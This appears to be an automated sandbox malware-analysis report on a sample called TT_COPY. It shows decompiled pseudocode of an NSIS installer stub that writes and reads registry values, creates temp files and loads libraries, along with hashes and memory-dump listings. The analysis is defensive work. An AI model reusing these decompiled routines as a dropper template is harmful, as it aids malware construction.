                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                                            • Opcode ID: 22c13feabb130e8cfed80aaa2b258461f0f54165cecd77f2806852d869ab649e
                                                                                                                            • Instruction ID: 56d71706fcffe4fc6b49bc671edb573eb4dae77c3bb2bb0d583acdbd19f20c56
                                                                                                                            • Opcode Fuzzy Hash: 22c13feabb130e8cfed80aaa2b258461f0f54165cecd77f2806852d869ab649e
                                                                                                                            • Instruction Fuzzy Hash: 1C41B3B25002419ADB219F20DCD9B9D37ECEF45314F1449E9F9069A2C6EBB4978DC760
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 952 40248a-4024bb call 402da6 * 2 call 402e36 959 4024c1-4024cb 952->959 960 402c2a-402c39 952->960 961 4024cd-4024da call 402da6 lstrlenW 959->961 962 4024de-4024e1 959->962 961->962 965 4024e3-4024f4 call 402d84 962->965 966 4024f5-4024f8 962->966 965->966 970 402509-40251d RegSetValueExW 966->970 971 4024fa-402504 call 4032b4 966->971 974 402522-402603 RegCloseKey 970->974 975 40251f 970->975 971->970 974->960 975->974
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E0040248A(void* __eax, int __ebx, intOrPtr __edx) {
                                                                                                                            				void* _t20;
                                                                                                                            				void* _t21;
                                                                                                                            				int _t24;
                                                                                                                            				long _t25;
                                                                                                                            				int _t30;
                                                                                                                            				intOrPtr _t33;
                                                                                                                            				void* _t34;
                                                                                                                            				intOrPtr _t37;
                                                                                                                            				void* _t39;
                                                                                                                            				void* _t42;
                                                                                                                            
                                                                                                                            				_t33 = __edx;
                                                                                                                            				_t30 = __ebx;
                                                                                                                            				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                                                            				_t34 = __eax;
                                                                                                                            				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                                                            				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                                                            				_t20 = E00402DA6(0x11);
                                                                                                                            				 *(_t39 - 4) = 1;
                                                                                                                            				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                                                                            				 *(_t39 + 8) = _t21;
                                                                                                                            				if(_t21 != __ebx) {
                                                                                                                            					_t24 = 0;
                                                                                                                            					if(_t37 == 1) {
                                                                                                                            						E00402DA6(0x23);
                                                                                                                            						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                                                                                            					}
                                                                                                                            					if(_t37 == 4) {
                                                                                                                            						 *0x40b5f0 = E00402D84(3);
                                                                                                                            						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                                                            						_t24 = _t37;
                                                                                                                            					}
                                                                                                                            					if(_t37 == 3) {
                                                                                                                            						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                                                                                                            					}
                                                                                                                            					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                                                                                            					if(_t25 == 0) {
                                                                                                                            						 *(_t39 - 4) = _t30;
                                                                                                                            					}
                                                                                                                            					_push( *(_t39 + 8));
                                                                                                                            					RegCloseKey();
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                                                            				return 0;
                                                                                                                            			}













                                                                                                                            0x0040248a
                                                                                                                            0x0040248a
                                                                                                                            0x0040248a
                                                                                                                            0x0040248d
                                                                                                                            0x00402494
                                                                                                                            0x0040249e
                                                                                                                            0x004024a1
                                                                                                                            0x004024aa
                                                                                                                            0x004024b1
                                                                                                                            0x004024b8
                                                                                                                            0x004024bb
                                                                                                                            0x004024c1
                                                                                                                            0x004024cb
                                                                                                                            0x004024cf
                                                                                                                            0x004024da
                                                                                                                            0x004024da
                                                                                                                            0x004024e1
                                                                                                                            0x004024eb
                                                                                                                            0x004024f1
                                                                                                                            0x004024f4
                                                                                                                            0x004024f4
                                                                                                                            0x004024f8
                                                                                                                            0x00402504
                                                                                                                            0x00402504
                                                                                                                            0x00402515
                                                                                                                            0x0040251d
                                                                                                                            0x0040251f
                                                                                                                            0x0040251f
                                                                                                                            0x00402522
                                                                                                                            0x004025fd
                                                                                                                            0x004025fd
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nshF836.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nshF836.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nshF836.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nshF836.tmp
                                                                                                                            • API String ID: 2655323295-1166675737
                                                                                                                            • Opcode ID: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                                                                                            • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                            • Opcode Fuzzy Hash: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                                                                                            • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 977 40605c-406068 978 406069-40609d GetTickCount GetTempFileNameW 977->978 979 4060ac-4060ae 978->979 980 40609f-4060a1 978->980 982 4060a6-4060a9 979->982 980->978 981 4060a3 980->981 981->982
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                            				intOrPtr _v8;
                                                                                                                            				short _v12;
                                                                                                                            				short _t12;
                                                                                                                            				intOrPtr _t13;
                                                                                                                            				signed int _t14;
                                                                                                                            				WCHAR* _t17;
                                                                                                                            				signed int _t19;
                                                                                                                            				signed short _t23;
                                                                                                                            				WCHAR* _t26;
                                                                                                                            
                                                                                                                            				_t26 = _a4;
                                                                                                                            				_t23 = 0x64;
                                                                                                                            				while(1) {
                                                                                                                            					_t12 =  *L"nsa"; // 0x73006e
                                                                                                                            					_t23 = _t23 - 1;
                                                                                                                            					_v12 = _t12;
                                                                                                                            					_t13 =  *0x40a57c; // 0x61
                                                                                                                            					_v8 = _t13;
                                                                                                                            					_t14 = GetTickCount();
                                                                                                                            					_t19 = 0x1a;
                                                                                                                            					_v8 = _v8 + _t14 % _t19;
                                                                                                                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                                                            					if(_t17 != 0) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					if(_t23 != 0) {
                                                                                                                            						continue;
                                                                                                                            					} else {
                                                                                                                            						 *_t26 =  *_t26 & _t23;
                                                                                                                            					}
                                                                                                                            					L4:
                                                                                                                            					return _t17;
                                                                                                                            				}
                                                                                                                            				_t17 = _t26;
                                                                                                                            				goto L4;
                                                                                                                            			}












                                                                                                                            0x00406062
                                                                                                                            0x00406068
                                                                                                                            0x00406069
                                                                                                                            0x00406069
                                                                                                                            0x0040606e
                                                                                                                            0x0040606f
                                                                                                                            0x00406072
                                                                                                                            0x00406077
                                                                                                                            0x0040607a
                                                                                                                            0x00406084
                                                                                                                            0x00406091
                                                                                                                            0x00406095
                                                                                                                            0x0040609d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004060a1
                                                                                                                            0x00000000
                                                                                                                            0x004060a3
                                                                                                                            0x004060a3
                                                                                                                            0x004060a3
                                                                                                                            0x004060a6
                                                                                                                            0x004060a9
                                                                                                                            0x004060a9
                                                                                                                            0x004060ac
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                            • API String ID: 1716503409-944333549
                                                                                                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                            • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                            • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 53%
                                                                                                                            			E00405F14(void* __eflags, intOrPtr _a4) {
                                                                                                                            				int _t11;
                                                                                                                            				signed char* _t12;
                                                                                                                            				long _t16;
                                                                                                                            				intOrPtr _t18;
                                                                                                                            				intOrPtr* _t21;
                                                                                                                            				signed int _t23;
                                                                                                                            
                                                                                                                            				E0040653D(0x42fa70, _a4);
                                                                                                                            				_t21 = E00405EB7(0x42fa70);
                                                                                                                            				if(_t21 != 0) {
                                                                                                                            					E004067C4(_t21);
                                                                                                                            					if(( *0x434f18 & 0x00000080) == 0) {
                                                                                                                            						L5:
                                                                                                                            						_t23 = _t21 - 0x42fa70 >> 1;
                                                                                                                            						while(1) {
                                                                                                                            							_t11 = lstrlenW(0x42fa70);
                                                                                                                            							_push(0x42fa70);
                                                                                                                            							if(_t11 <= _t23) {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            							_t12 = E00406873();
                                                                                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                            								E00405E58(0x42fa70);
                                                                                                                            								continue;
                                                                                                                            							} else {
                                                                                                                            								goto L1;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						E00405E0C();
                                                                                                                            						_t16 = GetFileAttributesW(??); // executed
                                                                                                                            						return 0 | _t16 != 0xffffffff;
                                                                                                                            					}
                                                                                                                            					_t18 =  *_t21;
                                                                                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                            						goto L1;
                                                                                                                            					} else {
                                                                                                                            						goto L5;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				return 0;
                                                                                                                            			}









                                                                                                                            0x00405f20
                                                                                                                            0x00405f2b
                                                                                                                            0x00405f2f
                                                                                                                            0x00405f36
                                                                                                                            0x00405f42
                                                                                                                            0x00405f52
                                                                                                                            0x00405f54
                                                                                                                            0x00405f6c
                                                                                                                            0x00405f6d
                                                                                                                            0x00405f74
                                                                                                                            0x00405f75
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405f58
                                                                                                                            0x00405f5f
                                                                                                                            0x00405f67
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405f5f
                                                                                                                            0x00405f77
                                                                                                                            0x00405f7d
                                                                                                                            0x00000000
                                                                                                                            0x00405f8b
                                                                                                                            0x00405f44
                                                                                                                            0x00405f4a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405f4a
                                                                                                                            0x00405f31
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                            • GetFileAttributesW.KERNELBASE(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 3248276644-3355392842
                                                                                                                            • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                            • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                            • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                            • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                                                            				int _v8;
                                                                                                                            				long _t21;
                                                                                                                            				long _t24;
                                                                                                                            				char* _t30;
                                                                                                                            
                                                                                                                            				asm("sbb eax, eax");
                                                                                                                            				_v8 = 0x800;
                                                                                                                            				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                                            				_t30 = _a16;
                                                                                                                            				if(_t21 != 0) {
                                                                                                                            					L4:
                                                                                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                            				} else {
                                                                                                                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                                                                            					_t21 = RegCloseKey(_a20); // executed
                                                                                                                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                            						goto L4;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				return _t21;
                                                                                                                            			}







                                                                                                                            0x00406419
                                                                                                                            0x0040641b
                                                                                                                            0x00406433
                                                                                                                            0x00406438
                                                                                                                            0x0040643d
                                                                                                                            0x0040647b
                                                                                                                            0x0040647b
                                                                                                                            0x0040643f
                                                                                                                            0x00406451
                                                                                                                            0x0040645c
                                                                                                                            0x00406462
                                                                                                                            0x0040646d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040646d
                                                                                                                            0x00406481

                                                                                                                            APIs
                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C248), ref: 0040645C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseQueryValue
                                                                                                                            • String ID: Call
                                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                            • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                            • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E004020D8(void* __ebx, void* __eflags) {
                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                            				struct HINSTANCE__* _t31;
                                                                                                                            				void* _t32;
                                                                                                                            				WCHAR* _t35;
                                                                                                                            				intOrPtr* _t36;
                                                                                                                            				void* _t37;
                                                                                                                            				void* _t39;
                                                                                                                            
                                                                                                                            				_t32 = __ebx;
                                                                                                                            				asm("sbb eax, 0x434fc0");
                                                                                                                            				 *(_t39 - 4) = 1;
                                                                                                                            				if(__eflags < 0) {
                                                                                                                            					_push(0xffffffe7);
                                                                                                                            					L15:
                                                                                                                            					E00401423();
                                                                                                                            					L16:
                                                                                                                            					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                                                            					return 0;
                                                                                                                            				}
                                                                                                                            				_t35 = E00402DA6(0xfffffff0);
                                                                                                                            				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                                                            				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                                                            					L3:
                                                                                                                            					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                                                            					_t47 = _t23 - _t32;
                                                                                                                            					 *(_t39 + 8) = _t23;
                                                                                                                            					if(_t23 == _t32) {
                                                                                                                            						_push(0xfffffff6);
                                                                                                                            						goto L15;
                                                                                                                            					}
                                                                                                                            					L4:
                                                                                                                            					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                            					if(_t36 == _t32) {
                                                                                                                            						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                            					} else {
                                                                                                                            						 *(_t39 - 4) = _t32;
                                                                                                                            						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                                                            							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                                                                                            						} else {
                                                                                                                            							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                                                            							if( *_t36() != 0) {
                                                                                                                            								 *(_t39 - 4) = 1;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                                                                                            						FreeLibrary( *(_t39 + 8));
                                                                                                                            					}
                                                                                                                            					goto L16;
                                                                                                                            				}
                                                                                                                            				_t31 = GetModuleHandleW(_t35); // executed
                                                                                                                            				 *(_t39 + 8) = _t31;
                                                                                                                            				if(_t31 != __ebx) {
                                                                                                                            					goto L4;
                                                                                                                            				}
                                                                                                                            				goto L3;
                                                                                                                            			}










                                                                                                                            0x004020d8
                                                                                                                            0x004020d8
                                                                                                                            0x004020dd
                                                                                                                            0x004020e4
                                                                                                                            0x004021a3
                                                                                                                            0x004022f1
                                                                                                                            0x004022f1
                                                                                                                            0x00402c2a
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39
                                                                                                                            0x00402c39
                                                                                                                            0x004020f3
                                                                                                                            0x004020fd
                                                                                                                            0x00402100
                                                                                                                            0x00402110
                                                                                                                            0x00402114
                                                                                                                            0x0040211a
                                                                                                                            0x0040211c
                                                                                                                            0x0040211f
                                                                                                                            0x0040219c
                                                                                                                            0x00000000
                                                                                                                            0x0040219c
                                                                                                                            0x00402121
                                                                                                                            0x0040212c
                                                                                                                            0x00402130
                                                                                                                            0x00402170
                                                                                                                            0x00402132
                                                                                                                            0x00402135
                                                                                                                            0x00402138
                                                                                                                            0x00402164
                                                                                                                            0x0040213a
                                                                                                                            0x0040213d
                                                                                                                            0x00402146
                                                                                                                            0x00402148
                                                                                                                            0x00402148
                                                                                                                            0x00402146
                                                                                                                            0x00402138
                                                                                                                            0x00402178
                                                                                                                            0x00402191
                                                                                                                            0x00402191
                                                                                                                            0x00000000
                                                                                                                            0x00402178
                                                                                                                            0x00402103
                                                                                                                            0x0040210b
                                                                                                                            0x0040210e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
